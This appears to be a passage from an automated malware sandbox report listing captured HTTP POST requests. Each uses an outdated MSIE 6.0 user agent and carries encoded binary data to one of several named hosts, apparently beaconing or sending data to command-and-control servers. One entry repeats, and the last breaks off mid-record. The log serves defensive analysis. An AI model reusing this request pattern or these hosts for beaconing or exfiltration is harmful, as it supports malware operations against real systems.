                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 54 56 61 30 61 34 78 58 6d 32 66 34 53 55 73 31 39 79 33 67 38 4a 39 47 38 7a 70 6b 43 34 37 62 67 4a 6b 68 30 78 45 37 42 46 5a 6f 70 55 49 70 62 61 4e 70 70 68 67 39 34 67 64 2f 50 6b 65 6b 33 52 32 6f 76 78 4b 39 6f 75 62 77 57 6a 37 4d 77 69 68 51 77 35 38 4f 6e 55 66 43 63 58 6c 55 4a 4c 68 4e 4f 35 62 79 72 30 39 50 32 59 72 63 47 79 51 67 44 5a 43 48 4f 6e 74 5a 4e 6b 2b 66 59 64 6c 52 38 79 6c 41 57 69 7a 37 52 4e 33 38 51 38 36 4a 44 51 51 70 78 7a 58 43 4f 35 50 78 41 76 39 4c 65 69 72 56 45 58 75 37 6d 32 6a 6e 44 47 64 68 31 4c 6a 76 68 71 70 75 69 62 37 6c 65 4c 47 33 56 6a 30 58 36 2b 48 54 55 6d 48 7a 38 34 6c 58 56 61 69 4f 76 53 37 72 6e 65 4d 57 74 6c 50 6e 53 63 52 68 4c 44 4a 50 30 62 58 32 69 6a 6a 38 57 36 4c 52 6a 43 75 58 31 77 53 68 42 79 53 2b 76 6c 6b 57 72 42 46 34 4e 79 35 70 73 4b 48 45 6d 39 59 54 6f 73 42 33 4b 6f 74 69 63 33 38 34 64 73 2f 6d 73 74 49 4e 75 37 47 51 58 33 55 37 6c 70 79 33 4c 56 65 55 35 54 37 6d 6e 6a 73 51 69 6e 52 6c 39 4d 62 78 56 4f 41 57 79 56 4c 73 2b 33 31 6d 66 34 6d 79 7a 50 32 49 45 56 75 4f 6e 35 4c 78 47 6d 2b 2f 63 6b 52 6b 71 6c 50 64 77 33 33 6d 68 48 36 42 52 36 48 31 62 78 4a 47 58 56 4a 4b 65 4e 77 62 50 68 6e 77 44 59 49 69 64 62 4c 50 68 32 59 68 5a 55 65 36 6b 64 50 73 47 76 6b 30 59 44 43 39 34 78 59 6f 56 33 46 6d 41 38 64 44 30 53 39 58 52 77 78 70 35 2f 74 50 52 77 68 56 41 76 30 68 7a 79 43 69 38 70 67 4d 52 43 51 2b 61 33 31 71 52 4b 75 73 58 6c 6e 64 67 4d 66 6c 79 4f 4d 45 66 59 45 54 46 4b 72 6f 71 51 5a 4e 35 4f 51 2b 58 7a 56 71 46 61 68 5a 50 48 52 6a 61 42 48 53 42 48 62 50 34 33 6f 59 46 46 5a 35 2f 78 59 57 44 30 76 50 39 52 31 53 50 6c 46 6d 38 68 78 4f 51 37 6a 45 47 46 4a 4d 66 4e 4f 75 52 4e 57 64 65 6a 6f 71 73 34 78 46 69 4d 6f 32 30 39 30 3d Data Ascii: TVa0a4xXm2f4SUs19y3g8J9G8zpkC47bgJkh0xE7BFZopUIpbaNpphg94gd/Pkek3R2ovxK9oubwWj7MwihQw58OnUfCcXlUJLhNO5byr09P2YrcGyQgDZCHOntZNk+fYdlR8ylAWiz7RN38Q86JDQQpxzXCO5PxAv9LeirVEXu7m2jnDGdh1Ljvhqpuib7leLG3Vj0X6+HTUmHz84lXVaiOvS7rneMWtlPnScRhLDJP0bX2ijj8W6LRjCuX1wShByS+vlkWrBF4Ny5psKHEm9YTosB3Kotic384ds/mstINu7GQX3U7lpy3LVeU5T7mnjsQinRl9MbxVOAWyVLs+31mf4myzP2IEVuOn5LxGm+/ckRkqlPdw33mhH6BR6H1bxJGXVJKeNwbPhnwDYIidbLPh2YhZUe6kdPsGvk0YDC94xYoV3FmA8dD0S9XRwxp5/tPRwhVAv0hzyCi8pgMRCQ+a31qRKusXlndgMflyOMEfYETFKroqQZN5OQ+XzVqFahZPHRjaBHSBHbP43oYFFZ5/xYWD0vP9R1SPlFm8hxOQ7jEGFJMfNOuRNWdejoqs4xFiMo2090=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 53 34 7a 38 63 5a 54 36 63 57 65 45 2f 76 6e 6b 62 36 53 44 58 2b 66 47 2b 36 4d 4d 2f 79 45 62 43 47 6d 58 76 33 43 47 6f 33 44 62 56 4d 75 58 46 7a 32 30 4e 38 58 7a 37 6e 7a 74 42 51 54 67 64 44 63 55 61 39 72 6a 7a 37 71 75 48 2f 69 4c 63 5a 76 33 74 32 6b 57 65 6b 4a 52 68 7a 56 41 76 6d 79 39 6b 53 6e 71 56 74 59 59 47 52 78 74 4d 4e 69 4b 63 63 52 56 52 5a 46 34 45 53 37 50 62 34 51 4f 64 52 47 56 74 38 36 54 6c 56 74 32 38 67 59 64 74 4c 67 73 5a 6c 5a 71 33 4f 65 52 77 68 31 38 67 57 61 2b 77 46 66 36 7a 4c 4f 47 6b 6b 4a 75 62 4a 63 63 59 7a 39 2f 49 5a 48 6f 46 72 76 71 74 6f 34 66 66 4f 64 62 4c 37 75 55 35 32 48 4f 44 70 30 4e 78 4f 6f 68 38 75 45 73 30 36 39 75 76 77 6c 6e 4d 66 7a 75 4a 33 68 43 41 78 76 56 70 56 79 67 47 68 35 6f 32 70 53 78 4f 57 6f 6c 35 73 53 7a 30 35 4b 30 78 57 4f 6f 6e 56 2f 6e 68 6c 42 6d 48 4b 70 4b 54 4f 76 48 55 6d 78 52 64 33 35 4b 79 43 68 2f 50 76 36 4e 6b 4c 69 4f 47 56 44 52 6a 71 42 32 37 62 69 2f 56 36 36 43 49 69 78 31 73 68 7a 61 72 4e 6e 53 2b 2b 4f 43 32 68 2f 32 4a 52 63 50 43 70 36 47 2b 75 37 55 63 6d 63 72 44 69 2b 73 67 36 33 46 5a 30 54 74 62 32 79 43 49 42 33 65 48 43 48 6a 31 36 54 53 66 46 2f 31 50 51 36 6d 48 6a 43 44 32 63 34 33 4e 6d 57 74 61 71 61 38 47 6e 75 7a 79 56 52 6a 41 6b 58 72 79 2f 4a 46 38 32 50 67 62 72 57 2f 46 73 6f 37 6f 66 57 50 71 32 36 4b 35 71 36 35 66 4b 61 37 30 59 78 72 74 47 54 65 4b 34 79 69 5a 6a 78 58 32 2b 67 2f 63 32 76 7a 30 4c 61 71 52 7a 74 41 5a 36 46 42 77 6c 34 4e 74 45 6f 50 70 43 48 73 6e 76 37 4d 34 56 72 42 6b 64 6f 45 42 55 62 30 32 41 2f 35 46 4d 7a 4c 4f 66 4e 61 72 57 36 52 64 65 6b 72 4d 41 72 36 5a 4a 69 59 37 33 76 6c 53 34 43 4f 76 42 77 6a 51 41 56 73 78 70 58 54 6a 31 31 57 Data Ascii: S4z8cZT6cWeE/vnkb6SDX+fG+6MM/yEbCGmXv3CGo3DbVMuXFz20N8Xz7nztBQTgdDcUa9rjz7quH/iLcZv3t2kWekJRhzVAvmy9kSnqVtYYGRxtMNiKccRVRZF4ES7Pb4QOdRGVt86TlVt28gYdtLgsZlZq3OeRwh18gWa+wFf6zLOGkkJubJccYz9/IZHoFrvqto4ffOdbL7uU52HODp0NxOoh8uEs069uvwlnMfzuJ3hCAxvVpVygGh5o2pSxOWol5sSz05K0xWOonV/nhlBmHKpKTOvHUmxRd35KyCh/Pv6NkLiOGVDRjqB27bi/V66CIix1shzarNnS++OC2h/2JRcPCp6G+u7UcmcrDi+sg63FZ0Ttb2yCIB3eHCHj16TSfF/1PQ6mHjCD2c43NmWtaqa8GnuzyVRjAkXry/JF82PgbrW/Fso7ofWPq26K5q65fKa70YxrtGTeK4yiZjxX2+g/c2vz0LaqRztAZ6FBwl4NtEoPpCHsnv7M4VrBkdoEBUb02A/5FMzLOfNarW6RdekrMAr6ZJiY73vlS4COvBwjQAVsxpXTj11W
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 64 33 6f 6c 63 5a 6a 7a 63 57 65 50 52 41 74 79 6d 2b 49 65 72 6f 75 61 56 48 5a 67 78 76 76 59 54 4e 41 71 6b 48 6b 6f 32 5a 76 39 4e 70 59 4e 4b 56 61 75 69 57 78 62 71 58 4f 59 65 78 7a 66 45 55 49 48 53 66 71 38 5a 50 70 73 73 75 62 6f 44 30 64 47 36 62 4b 6c 43 4a 45 4a 70 72 6a 2f 36 4c 59 52 6e 5a 48 45 6e 54 55 69 34 62 79 45 45 66 69 30 38 6a 46 65 49 4b 49 6b 43 31 67 54 32 47 32 36 62 52 68 64 41 6e 6e 65 43 73 73 75 74 4a 4e 2f 47 68 78 52 31 58 31 64 66 35 31 4b 47 6c 36 52 74 43 55 69 6a 52 35 46 68 4f 2b 4d 67 72 62 62 2f 69 44 77 4a 58 69 72 6b 46 47 32 33 42 57 49 50 33 57 62 79 77 69 33 37 2b 58 55 73 6b 4f 74 57 73 53 31 55 33 41 70 36 63 51 46 48 75 72 66 70 56 74 44 44 6e 6f 69 4b 32 30 49 32 34 55 76 4b 30 58 42 63 57 37 46 78 39 44 6f 6c 34 4f 77 42 61 43 4a 79 49 31 75 6e 6a 74 59 34 35 6d 2b 72 6f 76 30 61 69 47 59 49 49 46 5a 75 61 4b 66 58 63 6d 44 6a 45 32 4f 64 4f 55 4c 65 56 69 31 42 37 72 70 52 72 75 66 4b 61 39 67 42 55 46 6a 36 46 71 2f 4b 63 35 70 49 5a 63 58 4c 6b 70 42 59 53 69 47 4a 34 46 2f 37 37 4c 38 4e 72 6a 63 33 45 37 4b 6d 44 44 35 68 45 6b 2b 46 70 63 58 78 74 4d 35 4b 48 7a 4f 4f 64 43 53 47 35 63 49 70 42 55 4e 54 68 43 76 32 30 68 6e 41 71 78 41 54 6b 79 58 54 46 4c 57 78 5a 63 37 33 36 68 7a 39 49 38 4a 45 4d 73 55 57 54 36 4d 7a 6f 30 6e 6e 75 33 4f 64 39 4f 53 6a 4d 6d 69 77 4e 6f 59 79 50 36 4e 50 77 37 4d 42 49 66 65 6b 67 4b 55 65 72 44 7a 77 2f 47 43 72 31 56 4b 65 52 52 38 78 73 49 65 6c 45 4c 4c 42 49 72 30 38 59 6e 77 73 54 78 50 4b 48 33 72 48 74 47 38 50 67 79 37 32 34 52 46 6f 58 62 4f 41 76 4b 77 30 77 37 2f 56 49 30 55 48 49 47 71 4a 57 37 57 50 41 64 52 70 4e 61 78 34 37 7a 6c 63 43 30 68 46 74 6b 37 34 74 4a 52 65 30 6a 75 5a 44 77 4f 69 41 38 3d Data Ascii: d3olcZjzcWePRAtym+IerouaVHZgxvvYTNAqkHko2Zv9NpYNKVauiWxbqXOYexzfEUIHSfq8ZPpssuboD0dG6bKlCJEJprj/6LYRnZHEnTUi4byEEfi08jFeIKIkC1gT2G26bRhdAnneCssutJN/GhxR1X1df51KGl6RtCUijR5FhO+Mgrbb/iDwJXirkFG23BWIP3Wbywi37+XUskOtWsS1U3Ap6cQFHurfpVtDDnoiK20I24UvK0XBcW7Fx9Dol4OwBaCJyI1unjtY45m+rov0aiGYIIFZuaKfXcmDjE2OdOULeVi1B7rpRrufKa9gBUFj6Fq/Kc5pIZcXLkpBYSiGJ4F/77L8Nrjc3E7KmDD5hEk+FpcXxtM5KHzOOdCSG5cIpBUNThCv20hnAqxATkyXTFLWxZc736hz9I8JEMsUWT6Mzo0nnu3Od9OSjMmiwNoYyP6NPw7MBIfekgKUerDzw/GCr1VKeRR8xsIelELLBIr08YnwsTxPKH3rHtG8Pgy724RFoXbOAvKw0w7/VI0UHIGqJW7WPAdRpNax47zlcC0hFtk74tJRe0juZDwOiA8=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 54 56 61 30 61 34 78 58 6d 32 66 34 53 55 73 31 39 79 33 67 38 4a 39 47 38 7a 70 6b 43 34 37 62 67 4a 6b 68 30 78 45 37 42 46 5a 6f 70 55 49 70 62 61 4e 70 70 68 67 39 34 67 64 2f 50 6b 65 6b 33 52 32 6f 76 78 4b 39 6f 75 62 77 57 6a 37 4d 77 69 68 51 77 35 38 4f 6e 55 66 43 63 58 6c 55 4a 4c 68 4e 4f 35 62 79 72 30 39 50 32 59 72 63 47 79 51 67 44 5a 43 48 4f 6e 74 5a 4e 6b 2b 66 59 64 6c 52 38 79 6c 41 57 69 7a 37 52 4e 33 38 51 38 36 4a 44 51 51 70 78 7a 58 43 4f 35 50 78 41 76 39 4c 65 69 72 56 45 58 75 37 6d 32 6a 6e 44 47 64 68 31 4c 6a 76 68 71 70 75 69 62 37 6c 65 4c 47 33 56 6a 30 58 36 2b 48 54 55 6d 48 7a 38 34 6c 58 56 61 69 4f 76 53 37 72 6e 65 4d 57 74 6c 50 6e 53 63 52 68 4c 44 4a 50 30 62 58 32 69 6a 6a 38 57 36 4c 52 6a 43 75 58 31 77 53 68 42 79 53 2b 76 6c 6b 57 72 42 46 34 4e 79 35 70 73 4b 48 45 6d 39 59 54 6f 73 42 33 4b 6f 74 69 63 33 38 34 64 73 2f 6d 73 74 49 4e 75 37 47 51 58 33 55 37 6c 70 79 33 4c 56 65 55 35 54 37 6d 6e 6a 73 51 69 6e 52 6c 39 4d 62 78 56 4f 41 57 79 56 4c 73 2b 33 31 6d 66 34 6d 79 7a 50 32 49 45 56 75 4f 6e 35 4c 78 47 6d 2b 2f 63 6b 52 6b 71 6c 50 64 77 33 33 6d 68 48 36 42 52 36 48 31 62 78 4a 47 58 56 4a 4b 65 4e 77 62 50 68 6e 77 44 59 49 69 64 62 4c 50 68 32 59 68 5a 55 65 36 6b 64 50 73 47 76 6b 30 59 44 43 39 34 78 59 6f 56 33 46 6d 41 38 64 44 30 53 39 58 52 77 78 70 35 2f 74 50 52 77 68 56 41 76 30 68 7a 79 43 69 38 70 67 4d 52 43 51 2b 61 33 31 71 52 4b 75 73 58 6c 6e 64 67 4d 66 6c 79 4f 4d 45 66 59 45 54 46 4b 72 6f 71 51 5a 4e 35 4f 51 2b 58 7a 56 71 46 61 68 5a 50 48 52 6a 61 42 48 53 42 48 62 50 34 33 6f 59 46 46 5a 35 2f 78 59 57 44 30 76 50 39 52 31 53 50 6c 46 6d 38 68 78 4f 51 37 6a 45 47 46 4a 4d 66 4e 4f 75 52 4e 57 64 65 6a 6f 71 73 34 78 46 69 4d 6f 32 30 39 30 3d Data Ascii: TVa0a4xXm2f4SUs19y3g8J9G8zpkC47bgJkh0xE7BFZopUIpbaNpphg94gd/Pkek3R2ovxK9oubwWj7MwihQw58OnUfCcXlUJLhNO5byr09P2YrcGyQgDZCHOntZNk+fYdlR8ylAWiz7RN38Q86JDQQpxzXCO5PxAv9LeirVEXu7m2jnDGdh1Ljvhqpuib7leLG3Vj0X6+HTUmHz84lXVaiOvS7rneMWtlPnScRhLDJP0bX2ijj8W6LRjCuX1wShByS+vlkWrBF4Ny5psKHEm9YTosB3Kotic384ds/mstINu7GQX3U7lpy3LVeU5T7mnjsQinRl9MbxVOAWyVLs+31mf4myzP2IEVuOn5LxGm+/ckRkqlPdw33mhH6BR6H1bxJGXVJKeNwbPhnwDYIidbLPh2YhZUe6kdPsGvk0YDC94xYoV3FmA8dD0S9XRwxp5/tPRwhVAv0hzyCi8pgMRCQ+a31qRKusXlndgMflyOMEfYETFKroqQZN5OQ+XzVqFahZPHRjaBHSBHbP43oYFFZ5/xYWD0vP9R1SPlFm8hxOQ7jEGFJMfNOuRNWdejoqs4xFiMo2090=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pcgrate.comCache-Control: no-cacheData Raw: 43 57 72 67 66 77 4f 76 6b 32 65 58 42 39 50 4c 43 67 6a 31 62 53 7a 45 57 30 69 70 6d 58 4c 55 35 34 7a 32 61 7a 5a 75 4b 4b 48 4f 59 56 53 63 54 63 4d 77 4d 39 77 56 55 68 4a 66 2b 62 6e 37 61 4c 5a 71 32 77 4a 66 63 53 37 4e 49 33 53 63 53 36 46 4e 6e 30 55 54 41 79 73 76 30 66 4c 2f 31 72 73 7a 44 2b 49 66 31 6f 5a 50 79 42 49 33 56 4f 46 79 34 5a 62 76 77 32 46 56 64 37 37 35 46 6e 66 36 74 67 72 6f 41 36 6b 64 7a 61 36 56 46 66 2b 32 55 48 69 55 64 77 77 57 38 4c 56 70 77 4d 4f 76 47 71 72 34 38 52 59 55 51 74 34 30 31 71 70 34 52 30 4b 79 50 76 47 69 71 54 5a 38 45 4f 6e 52 35 39 45 39 4b 38 46 62 5a 6a 4c 46 59 4f 6d 55 67 6e 6c 5a 7a 45 69 70 67 4d 6c 31 30 49 6e 62 31 37 37 77 51 61 4d 45 61 43 36 37 6f 73 4a 68 2f 76 51 4e 53 46 78 51 4e 46 7a 4f 58 69 32 42 30 73 63 58 5a 49 43 55 2f 59 7a 78 51 4c 6d 66 75 61 57 78 48 6f 4d 79 41 67 41 48 4b 6a 68 31 36 32 63 4e 4d 2b 5a 52 57 54 44 70 35 58 6b 43 6b 49 4e 50 55 54 63 58 49 34 34 7a 44 6d 67 45 4d 56 6e 72 2f 48 75 6f 74 66 6d 36 73 41 6c 55 78 66 49 7a 48 31 34 37 43 5a 78 75 52 50 5a 57 73 51 53 49 6c 31 6e 45 42 35 38 4b 4c 37 69 54 54 42 5a 6f 69 46 57 46 69 79 6b 62 46 4b 55 4a 75 58 6b 32 43 31 45 6b 6f 37 2b 65 2b 31 57 79 6e 54 4a 37 41 57 37 52 34 6a 53 63 47 2f 41 71 38 44 77 56 6b 4c 2f 78 78 38 6d 32 46 63 75 68 79 67 46 36 37 6b 54 49 4a 52 45 47 79 51 6d 36 5a 57 38 71 79 42 58 53 4a 41 71 57 4e 4a 74 6c 73 32 7a 6f 6c 4e 69 47 79 43 4d 71 57 48 75 4b 57 59 64 56 73 4f 45 58 62 50 46 6a 70 77 53 39 62 4b 66 7a 33 4f 75 6c 74 55 56 35 53 52 6c 79 72 73 41 75 4f 55 55 67 35 4d 35 45 73 78 69 66 37 41 53 64 4c 4c 30 52 36 48 64 68 38 51 4a 4f 78 4b 37 72 44 6a 6c 74 4e 73 66 4c 6f 69 66 74 6b 35 79 54 5a 76 5a 62 4a 45 67 5a 42 6b 35 2b 78 32 43 59 43 35 67 38 Data Ascii: CWrgfwOvk2eXB9PLCgj1bSzEW0ipmXLU54z2azZuKKHOYVScTcMwM9wVUhJf+bn7aLZq2wJfcS7NI3ScS6FNn0UTAysv0fL/1rszD+If1oZPyBI3VOFy4Zbvw2FVd775Fnf6tgroA6kdza6VFf+2UHiUdwwW8LVpwMOvGqr48RYUQt401qp4R0KyPvGiqTZ8EOnR59E9K8FbZjLFYOmUgnlZzEipgMl10Inb177wQaMEaC67osJh/vQNSFxQNFzOXi2B0scXZICU/YzxQLmfuaWxHoMyAgAHKjh162cNM+ZRWTDp5XkCkINPUTcXI44zDmgEMVnr/Huotfm6sAlUxfIzH147CZxuRPZWsQSIl1nEB58KL7iTTBZoiFWFiykbFKUJuXk2C1Eko7+e+1WynTJ7AW7R4jScG/Aq8DwVkL/xx8m2FcuhygF67kTIJREGyQm6ZW8qyBXSJAqWNJtls2zolNiGyCMqWHuKWYdVsOEXbPFjpwS9bKfz3OultUV5SRlyrsAuOUUg5M5Esxif7ASdLL0R6Hdh8QJOxK7rDjltNsfLoiftk5yTZvZbJEgZBk5+x2CYC5g8
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.waldi.plCache-Control: no-cacheData Raw: 68 4c 2b 33 46 34 37 74 6f 47 66 61 62 34 63 34 47 5a 63 66 30 66 45 42 2f 44 36 4f 72 6a 77 37 6f 71 61 5a 32 65 76 33 78 32 58 6f 67 6e 6b 72 77 30 4a 53 4c 37 38 5a 56 67 48 70 68 59 4f 4a 36 41 5a 6f 6c 6f 47 37 54 2b 49 78 74 45 66 30 45 61 53 54 35 43 38 4f 56 74 58 6b 61 37 30 76 46 53 4f 7a 56 46 6f 41 32 6e 50 50 46 54 75 54 68 76 63 44 75 4e 7a 30 6c 31 47 78 74 64 57 79 41 34 77 72 46 31 54 65 4e 36 4e 6e 4a 56 6e 62 41 35 39 54 65 57 6b 38 38 46 6c 6a 2f 54 2b 76 46 65 58 4d 68 57 4a 69 66 43 50 44 46 63 4f 57 39 41 49 64 2f 45 63 30 75 4a 6b 79 6e 34 46 73 6c 39 49 69 6a 73 36 64 48 6d 79 72 30 55 61 4c 70 75 61 61 44 61 5a 6b 4f 33 6b 41 76 37 69 62 48 56 47 74 62 65 71 73 57 63 31 31 70 59 6f 36 32 41 52 6e 56 30 6c 47 5a 57 44 56 41 4b 68 68 2b 6c 4f 53 68 42 4a 2f 37 58 32 6a 6d 6e 4a 75 49 72 30 6a 42 53 42 59 69 6d 30 31 47 37 64 6d 51 53 6e 38 74 47 6e 59 4b 75 61 49 35 41 6b 64 55 6c 41 76 45 43 5a 6c 32 32 73 39 38 72 6d 2b 52 66 63 49 50 61 77 6b 4d 31 63 70 44 49 62 37 73 4a 73 52 35 41 46 78 6a 54 31 6d 47 50 56 4d 5a 4b 71 2f 4e 6c 32 53 38 59 42 4c 41 47 52 65 70 33 56 77 54 72 53 77 41 72 71 35 5a 7a 50 36 48 37 52 77 59 48 61 4d 4b 4a 55 78 59 59 50 43 51 6b 35 74 66 31 51 69 4a 48 38 6e 50 6c 63 51 67 72 6c 2b 4a 35 6e 4c 42 46 71 4d 30 6a 4f 53 6a 56 4f 4f 67 78 54 70 30 7a 77 43 67 6e 41 72 36 34 68 2f 4f 2b 41 7a 32 48 37 36 2b 56 6a 52 64 69 37 36 52 59 4e 5a 32 66 58 4a 42 36 75 4a 7a 7a 35 42 59 38 4d 4f 51 6b 75 4d 2f 35 71 5a 52 55 69 4e 44 56 79 31 39 34 70 66 63 57 64 76 58 42 76 4f 43 53 50 73 65 46 6f 49 6b 4a 41 53 43 44 65 50 70 67 66 2f 79 46 67 37 35 39 62 65 35 4c 47 6f 49 6c 6f 62 70 6d 69 73 6c 5a 2f 57 49 61 4c 2b 58 74 6f 54 63 6d 51 6c 2b 31 4b 37 4c 31 73 6e 77 49 4c 33 Data Ascii: hL+3F47toGfab4c4GZcf0fEB/D6Orjw7oqaZ2ev3x2Xognkrw0JSL78ZVgHphYOJ6AZoloG7T+IxtEf0EaST5C8OVtXka70vFSOzVFoA2nPPFTuThvcDuNz0l1GxtdWyA4wrF1TeN6NnJVnbA59TeWk88Flj/T+vFeXMhWJifCPDFcOW9AId/Ec0uJkyn4Fsl9Iijs6dHmyr0UaLpuaaDaZkO3kAv7ibHVGtbeqsWc11pYo62ARnV0lGZWDVAKhh+lOShBJ/7X2jmnJuIr0jBSBYim01G7dmQSn8tGnYKuaI5AkdUlAvECZl22s98rm+RfcIPawkM1cpDIb7sJsR5AFxjT1mGPVMZKq/Nl2S8YBLAGRep3VwTrSwArq5ZzP6H7RwYHaMKJUxYYPCQk5tf1QiJH8nPlcQgrl+J5nLBFqM0jOSjVOOgxTp0zwCgnAr64h/O+Az2H76+VjRdi76RYNZ2fXJB6uJzz5BY8MOQkuM/5qZRUiNDVy194pfcWdvXBvOCSPseFoIkJASCDePpgf/yFg759be5LGoIlobpmislZ/WIaL+XtoTcmQl+1K7L1snwIL3
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 69 64 77 73 6b 49 49 32 6c 47 65 75 79 66 34 38 64 59 4e 66 33 77 58 66 4c 6f 61 53 72 45 4e 4f 31 69 53 4e 61 48 35 31 48 47 73 39 59 34 49 30 44 69 59 73 33 78 59 50 70 6d 6b 41 39 7a 76 63 43 6d 70 30 30 73 70 49 5a 35 58 6d 59 34 5a 39 32 6a 35 73 54 4e 4c 56 62 56 47 62 53 6b 73 37 6d 77 56 51 66 6e 72 76 2f 36 4d 44 73 34 30 69 53 31 57 41 73 71 69 70 59 65 48 67 42 79 48 42 63 49 32 64 43 6b 6c 48 59 56 4a 76 68 57 4e 6c 4d 49 38 36 41 39 6a 73 75 33 32 48 31 31 4d 64 55 34 55 37 34 63 4f 78 42 77 6e 72 65 70 58 6d 41 37 7a 6a 78 4f 62 4a 65 63 77 33 58 2f 4b 45 56 70 6e 57 53 52 34 41 4f 57 50 57 4d 64 70 68 47 51 6d 7a 41 71 72 73 61 56 31 4b 66 57 6f 50 35 54 71 78 72 31 70 79 55 6f 4b 6b 77 34 41 37 32 65 7a 38 65 63 4e 7a 78 58 39 35 31 53 64 4a 2b 39 2b 74 4b 5a 44 42 53 59 70 2b 2f 55 54 68 70 73 47 73 37 72 6c 38 42 4e 7a 79 67 59 6f 58 35 67 4b 56 4c 52 57 34 56 4d 4c 47 66 52 54 65 52 63 70 6a 4c 6f 47 6f 70 75 54 46 53 37 77 39 5a 42 32 49 6f 77 49 2f 53 41 42 68 4b 66 6d 2f 58 54 48 4a 45 41 30 48 33 64 73 47 2b 39 2b 62 70 42 67 74 74 4d 59 71 2f 50 57 4c 62 4c 66 36 2f 38 68 4a 36 69 33 57 66 6e 6a 71 52 70 45 38 2b 30 52 68 70 69 57 67 46 51 6a 71 39 75 35 42 33 63 5a 71 48 73 31 6a 70 47 74 73 4b 57 45 79 46 44 4e 4b 4d 4d 37 76 44 62 43 4b 41 39 7a 53 4f 57 4d 68 67 58 73 79 72 70 33 41 67 45 74 68 79 2b 68 74 5a 61 4e 38 6d 63 69 6d 69 73 70 6d 6a 72 59 51 70 56 51 33 61 50 64 5a 61 2b 4e 75 64 31 65 69 50 58 73 48 33 50 62 54 75 4d 53 4d 79 71 37 79 73 49 67 46 49 2b 61 36 79 43 59 75 63 61 73 30 33 6f 59 39 62 51 36 59 76 74 39 2f 4e 34 63 63 74 4c 34 6a 6e 6a 32 51 70 65 31 41 30 41 31 71 6c 42 56 53 Data Ascii: idwskII2lGeuyf48dYNf3wXfLoaSrENO1iSNaH51HGs9Y4I0DiYs3xYPpmkA9zvcCmp00spIZ5XmY4Z92j5sTNLVbVGbSks7mwVQfnrv/6MDs40iS1WAsqipYeHgByHBcI2dCklHYVJvhWNlMI86A9jsu32H11MdU4U74cOxBwnrepXmA7zjxObJecw3X/KEVpnWSR4AOWPWMdphGQmzAqrsaV1KfWoP5Tqxr1pyUoKkw4A72ez8ecNzxX951SdJ+9+tKZDBSYp+/UThpsGs7rl8BNzygYoX5gKVLRW4VMLGfRTeRcpjLoGopuTFS7w9ZB2IowI/SABhKfm/XTHJEA0H3dsG+9+bpBgttMYq/PWLbLf6/8hJ6i3WfnjqRpE8+0RhpiWgFQjq9u5B3cZqHs1jpGtsKWEyFDNKMM7vDbCKA9zSOWMhgXsyrp3AgEthy+htZaN8mcimispmjrYQpVQ3aPdZa+Nud1eiPXsH3PbTuMSMyq7ysIgFI+a6yCYucas03oY9bQ6Yvt9/N4cctL4jnj2Qpe1A0A1qlBVS
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 2b 4d 53 76 45 57 75 37 6f 47 63 55 62 68 68 73 51 68 6d 34 31 39 52 55 4c 68 41 78 55 69 38 41 7a 36 4f 30 76 6a 59 48 4c 4a 76 54 54 6a 42 39 47 4b 62 65 6c 4f 4d 4b 75 43 4a 6b 35 68 76 31 37 6f 6e 6a 2f 33 78 65 47 64 4d 45 32 53 71 6e 32 47 43 45 43 65 43 62 38 48 41 37 67 32 64 64 49 63 63 56 7a 2f 50 31 67 41 70 36 2f 43 34 39 72 6b 52 47 51 42 2f 46 75 49 76 6e 55 59 42 42 54 78 2f 51 41 73 73 42 54 56 62 61 54 71 63 47 65 49 66 75 6f 6b 67 62 38 63 51 55 4b 67 46 2b 2b 70 4e 2f 58 66 6b 79 48 37 43 68 76 42 63 74 45 33 64 75 5a 32 6a 6b 6e 70 4d 6e 53 32 32 55 6c 47 66 5a 52 50 57 4c 4c 63 41 75 41 53 6d 5a 64 68 7a 66 6d 46 4f 6b 54 4c 70 34 6c 47 69 44 31 2f 6f 2b 70 4a 69 4c 41 38 56 49 75 65 66 68 39 31 70 46 34 43 66 63 75 69 48 39 73 71 4f 6c 78 6a 72 72 51 7a 2f 74 34 54 57 64 61 7a 2f 57 44 35 7a 45 69 70 4b 48 4a 30 6d 37 46 47 52 47 50 41 51 50 37 48 58 68 64 61 34 67 52 6a 68 33 36 2f 4a 2b 33 47 62 56 30 34 7a 47 47 30 6b 73 49 6a 33 77 44 49 35 4e 58 36 33 73 50 42 31 35 69 51 36 68 43 50 70 45 63 6b 41 75 44 67 55 63 53 63 51 70 38 34 4c 69 39 4d 49 30 65 64 4c 56 50 6f 6f 46 51 5a 52 76 48 51 41 2f 56 58 42 55 4c 71 7a 44 78 74 45 79 6c 70 44 77 4d 6f 51 45 44 47 53 48 